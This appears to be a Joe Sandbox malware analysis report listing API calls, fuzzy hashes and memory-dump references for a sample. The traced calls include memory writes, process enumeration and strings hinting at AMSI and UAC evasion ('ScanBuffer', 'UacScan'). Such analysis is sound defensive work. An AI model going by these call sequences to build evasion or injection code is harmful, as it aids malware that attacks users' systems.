                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenValue
                                                                        • String ID:
                                                                        • API String ID: 779948276-0
                                                                        • Opcode ID: af84a5a4b3a469cb43555be89b9da18a3d790012dbe66188b129c58d9e085467
                                                                        • Instruction ID: edae75f932f5b8c51fba06123faaad38e9d2e7e9d882c2907f044e6e7ae0c347
                                                                        • Opcode Fuzzy Hash: af84a5a4b3a469cb43555be89b9da18a3d790012dbe66188b129c58d9e085467
                                                                        • Instruction Fuzzy Hash: 20116D71644205AFEB14EFA8E882D9D77EDEB08300B900426F905D7650DB70EE80DF58
                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02DCBA58), ref: 02C6F258
                                                                        • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C6F2C3), ref: 02C6F290
                                                                        • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02C6F2C3), ref: 02C6F29B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenValue
                                                                        • String ID:
                                                                        • API String ID: 779948276-0
                                                                        • Opcode ID: d24f702b6762f29d4039a9160fd2c1234b337e00b2001150209a066a4a12df4d
                                                                        • Instruction ID: 5c4a1fbbd9cd551b84069fcecada0aafde46d429a8a7e76d21a11b892bedfc63
                                                                        • Opcode Fuzzy Hash: d24f702b6762f29d4039a9160fd2c1234b337e00b2001150209a066a4a12df4d
                                                                        • Instruction Fuzzy Hash: 19116D71644205AFEB14EFA8E882D9D77EDEB08300B900426F905D7650DB70EE80DF58
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 5b0d7a0642fdee41f9497184701964693d6bd6af88a28030bed4084e680e1bbe
                                                                        • Instruction ID: 0e1839c3db8f31a1661d389861d6b8380413fc03c9e4c29ed0d718c2ff2240b0
                                                                        • Opcode Fuzzy Hash: 5b0d7a0642fdee41f9497184701964693d6bd6af88a28030bed4084e680e1bbe
                                                                        • Instruction Fuzzy Hash: 21F04F24708230C79B247B3A8E8466A379B5F843807101476EC4EDB115DB74CFC5D76E
                                                                        APIs
                                                                        • SysFreeString.OLEAUT32(02C6F4A4), ref: 02C54C6E
                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 02C54D5B
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02C54D6D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: String$Free$Alloc
                                                                        • String ID:
                                                                        • API String ID: 986138563-0
                                                                        • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                        • Instruction ID: 6b20ceafbb845493674a6bd092a4ac1986bb96d73231b55bfe4edcb7f9022607
                                                                        • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                        • Instruction Fuzzy Hash: 7DE012B82056255EEF286F219D44B37336AAFC1740B188499EC00CE154DB78E5C0BD3D
                                                                        APIs
                                                                        • SysFreeString.OLEAUT32(?), ref: 02C673DA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FreeString
                                                                        • String ID: H
                                                                        • API String ID: 3341692771-2852464175
                                                                        • Opcode ID: cba5732f5e0fce89ea263d740205a2d9cdd87ae2a38097a63749cb98d593d8c4
                                                                        • Instruction ID: 004b530fd4a9d5fb98412ec685b39a318fddcd07b341ae1215d818585898eeaa
                                                                        • Opcode Fuzzy Hash: cba5732f5e0fce89ea263d740205a2d9cdd87ae2a38097a63749cb98d593d8c4
                                                                        • Instruction Fuzzy Hash: 6EB1B074A01608DFDB15CF99D484AADFBF6FF89318F248569E809AB320D730A949CF50
                                                                        APIs
                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 02C5E781
                                                                          • Part of subcall function 02C5E364: VariantClear.OLEAUT32(?), ref: 02C5E373
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCopy
                                                                        • String ID:
                                                                        • API String ID: 274517740-0
                                                                        • Opcode ID: 1747e631e0fbf1811fb11e1d2180eced7205240a8638cd28ecea6c60a0185af6
                                                                        • Instruction ID: 767783504548591b5ca6915f467f2f86667e57c6357a7b8811266c1c6cf5455e
                                                                        • Opcode Fuzzy Hash: 1747e631e0fbf1811fb11e1d2180eced7205240a8638cd28ecea6c60a0185af6
                                                                        • Instruction Fuzzy Hash: D111822070023087CB34AF2AC8C4A6677DAAF857907108466ED4A8B215DB34CEC0EA6A
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant
                                                                        • String ID:
                                                                        • API String ID: 1927566239-0
                                                                        • Opcode ID: 4d6d333f01d282f7785365285abc890840ca403d6672a7bb69f1dc69dfff8039
                                                                        • Instruction ID: 61fc9edae86eb08fdf77b6499a12a17f536e50ef8d2b3d5bb93f92a66a5b8fa4
                                                                        • Opcode Fuzzy Hash: 4d6d333f01d282f7785365285abc890840ca403d6672a7bb69f1dc69dfff8039
                                                                        • Instruction Fuzzy Hash: 74312B72A00228ABDB11DFE9D884AAA77E9EB4C314F444565FD09D3250D734EBD0CBA9
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                          • Part of subcall function 02C68338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C683C2), ref: 02C683A4
                                                                        • FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                        • String ID:
                                                                        • API String ID: 1478290883-0
                                                                        • Opcode ID: 96d4c61cb17e807afaabe76f8f240f87b61580704cc032bdd6b5b016d2e8bfe5
                                                                        • Instruction ID: 3db70118c576f5d88224e8487b1e12235293dc40d5e686ccd847789fde1d9991
                                                                        • Opcode Fuzzy Hash: 96d4c61cb17e807afaabe76f8f240f87b61580704cc032bdd6b5b016d2e8bfe5
                                                                        • Instruction Fuzzy Hash: 442124B0680310AFE754FBB8DC46B6EF79EDB04700F500961BE08E7280DA75E994AA1D
                                                                        APIs
                                                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,02C66DB9,?,?,?,00000000), ref: 02C66D99
                                                                          • Part of subcall function 02C54C60: SysFreeString.OLEAUT32(02C6F4A4), ref: 02C54C6E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FreeFromProgString
                                                                        • String ID:
                                                                        • API String ID: 4225568880-0
                                                                        • Opcode ID: 203c76a356b2003e41db77301a1da4211a9bb7f9d4c4b3125172527ee037c345
                                                                        • Instruction ID: 5818da033c217fa44b0342000fa48607402b77578bfb2293772f169bd1dc873b
                                                                        • Opcode Fuzzy Hash: 203c76a356b2003e41db77301a1da4211a9bb7f9d4c4b3125172527ee037c345
                                                                        • Instruction Fuzzy Hash: 71E0ED75200718BBE325EF66DC81DAE77ADDB8A700B6104B1E800D3600DA39AE40A8A8
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(02C50000,?,00000105), ref: 02C55886
                                                                          • Part of subcall function 02C55ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C50000,02C7E790), ref: 02C55AE8
                                                                          • Part of subcall function 02C55ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C50000,02C7E790), ref: 02C55B06
                                                                          • Part of subcall function 02C55ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C50000,02C7E790), ref: 02C55B24
                                                                          • Part of subcall function 02C55ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C55B42
                                                                          • Part of subcall function 02C55ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C55BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C55B8B
                                                                          • Part of subcall function 02C55ACC: RegQueryValueExA.ADVAPI32(?,02C55D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C55BD1,?,80000001), ref: 02C55BA9
                                                                          • Part of subcall function 02C55ACC: RegCloseKey.ADVAPI32(?,02C55BD8,00000000,?,?,00000000,02C55BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C55BCB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                        • String ID:
                                                                        • API String ID: 2796650324-0
                                                                        • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                        • Instruction ID: bbee26b6fc895d25419e747dbb8cdbc83f471aee4aa9c22f0b0d6f38a6f7df14
                                                                        • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                        • Instruction Fuzzy Hash: 54E06D71A403248FCB10DE98C8C0B5633D8AF487A0F4409A1EC58CF246D7B0DA908BD4
                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02C57DF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                        • Instruction ID: 0969b2f74065261bbfd8eab9378983371a474520a408e9793a711317cdb5e913
                                                                        • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                        • Instruction Fuzzy Hash: 2AD05BB23092507AE224965A5D44EAB5BDCCBC6770F10073DF958C7180D760CC45C675
                                                                        APIs
                                                                          • Part of subcall function 02C6AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C6ADA3,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6AB30
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C6AB48
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C6AB5A
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C6AB6C
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C6AB7E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C6AB90
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C6ABA2
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C6ABB4
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C6ABC6
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C6ABD8
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C6ABEA
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C6ABFC
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C6AC0E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C6AC20
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C6AC32
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C6AC44
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C6AC56
                                                                        • Process32Next.KERNEL32(?,00000128), ref: 02C6ADE9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModuleNextProcess32
                                                                        • String ID:
                                                                        • API String ID: 2237597116-0
                                                                        • Opcode ID: 80d4906f37cff11d52340696f4a2f34708f82e0a8c702969cae5e494787003cc
                                                                        • Instruction ID: e12c7682e4dae8dcd91363557d9f5d245673429dac68af682a5b848280eb2e78
                                                                        • Opcode Fuzzy Hash: 80d4906f37cff11d52340696f4a2f34708f82e0a8c702969cae5e494787003cc
                                                                        • Instruction Fuzzy Hash: B5C012A26022201B8A1066F828C8AE3978DC98A2AA30448A2A508E2102EA258C10A2A0
                                                                        APIs
                                                                          • Part of subcall function 02C6AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C6ADA3,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6AB30
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C6AB48
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C6AB5A
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C6AB6C
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C6AB7E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C6AB90
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C6ABA2
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C6ABB4
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C6ABC6
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C6ABD8
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C6ABEA
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C6ABFC
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C6AC0E
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C6AC20
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C6AC32
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C6AC44
                                                                          • Part of subcall function 02C6AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C6AC56
                                                                        • Process32First.KERNEL32(?,00000128), ref: 02C6ADC9
                                                                        Similarity
                                                                        • API ID: AddressProc$FirstHandleModuleProcess32
                                                                        • String ID:
                                                                        • API String ID: 2774106396-0
                                                                        • Opcode ID: 6f84d78ba37dc2ba65fd8101fcd27e8862628f982f22f80d27c649d3d0b75779
                                                                        • Instruction ID: 346e3ce186c16a6d2df71324b8809a036c81fdd48744678a3ec8dcb36ff72f96
                                                                        • Opcode Fuzzy Hash: 6f84d78ba37dc2ba65fd8101fcd27e8862628f982f22f80d27c649d3d0b75779
                                                                        • Instruction Fuzzy Hash: 66C0807271222017CB1076F43CCC5D3578DCD851B730405B2F508F3101E7254C10A2D0
                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02C7356F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,Initialize), ref: 02C57E8B
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                        • Instruction ID: 1cc96caad34d7fdb090fc0dd8091a6918131d2bfe0941fad2c1e6bc7725e0e5b
                                                                        • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                        • Instruction Fuzzy Hash: 8EC08CF22117300E1E60A9BC1CC822943CD49C41357A01E21EC38CA2C1D766D8EA382C
                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02C7041F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,UacInitialize), ref: 02C57E67
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                        • Instruction ID: b22c15292c671022a062c0ccaf91bc88e9b1b1e898434834da2b54eaf3676ddb
                                                                        • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                        • Instruction Fuzzy Hash: D0C08CA02013A00E5A6469BD2CC824953CE49842393A40A21EC38C62E2D77AD8EB381C
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: FreeString
                                                                        • String ID:
                                                                        • API String ID: 3341692771-0
                                                                        • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                        • Instruction ID: 43f81b37e4c39fc67dabc0bf7aa4b1687c56c8107e1c7a0f5dd361be44dede21
                                                                        • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                        • Instruction Fuzzy Hash: F7C012A260063057EB355A99ACC475262CC9B85294B1800A1A805D7251E760E98056A9
                                                                        APIs
                                                                        • timeSetEvent.WINMM(00002710,00000000,02C7C350,00000000,00000001), ref: 02C7C36C
                                                                        Similarity
                                                                        • API ID: Eventtime
                                                                        • String ID:
                                                                        • API String ID: 2982266575-0
                                                                        • Opcode ID: 4d6e40708f20def14488d0f64afd2017000ecad35a5dc34658a18cde7da1205a
                                                                        • Instruction ID: 901dbfd0d4fb3feebb17e15746f77da53283dd69bfa330db4961b4fb371f999a
                                                                        • Opcode Fuzzy Hash: 4d6e40708f20def14488d0f64afd2017000ecad35a5dc34658a18cde7da1205a
                                                                        • Instruction Fuzzy Hash: FCC048F1B943022AFA1096A5AC82F721A9DD705B10F200412BA08EE2C1E2A29A605E68
                                                                        APIs
                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02C54C3F
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID:
                                                                        • API String ID: 2525500382-0
                                                                        • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                        • Instruction ID: dce14679a069ae0b0590d44f552e073007f804fdd696d4932a3673784d490cee
                                                                        • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                        • Instruction Fuzzy Hash: 98B0922420862115EA2C2A620E00732008D1BC0286F8900519E18C8091EB80D1C1983E
                                                                        APIs
                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02C54C57
                                                                        Similarity
                                                                        • API ID: FreeString
                                                                        • String ID:
                                                                        • API String ID: 3341692771-0
